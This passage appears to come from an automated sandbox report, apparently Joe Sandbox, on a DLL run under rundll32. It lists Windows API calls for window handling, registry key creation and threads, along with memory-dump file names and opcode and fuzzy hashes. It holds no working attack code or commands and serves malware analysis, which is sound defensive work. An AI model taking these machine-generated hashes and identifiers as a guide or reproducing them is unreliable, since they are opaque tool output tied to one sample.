                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                                    • GetParent.USER32(?), ref: 1002A22C
                                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                                    • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$LongParentVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 506644340-0
                                                                                                                                    • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                    • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                                    • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                    • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                                    • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                                    • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                                    • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                                    • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                      • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                    • String ID: V&'
                                                                                                                                    • API String ID: 1067611704-802299783
                                                                                                                                    • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                    • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                                    • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                    • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                                      • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2004563703-0
                                                                                                                                    • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                    • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                                    • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                    • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                                    • String ID: software
                                                                                                                                    • API String ID: 1740278721-2010147023
                                                                                                                                    • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                    • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                                    • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                    • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                                      • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                                      • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                                      • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                                      • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Task_impl$H_prolog3
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1204490572-0
                                                                                                                                    • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                    • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                                    • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                    • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                                      • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                                    • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                      • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 356813703-0
                                                                                                                                    • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                    • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                                    • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                    • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Brush
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2798902688-0
                                                                                                                                    • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                    • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                                    • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                    • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                      • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                                      • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                                      • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 63617653-0
                                                                                                                                    • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                    • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                                    • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                    • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                                    • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                                      • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                                    • _memset.LIBCMT ref: 1002D2F2
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4021759052-0
                                                                                                                                    • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                    • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                                    • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                    • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 1002D5FF
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                                      • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocString$H_prolog3_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 842698744-0
                                                                                                                                    • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                    • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                                    • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                    • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                      • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                      • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                      • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                                    • SendMessageA.USER32 ref: 10016A5B
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1877664794-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                                    • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                                    • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                    • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                    • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                    • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 670545878-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                                    • GetWindowRect.USER32 ref: 1002059C
                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1315500227-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
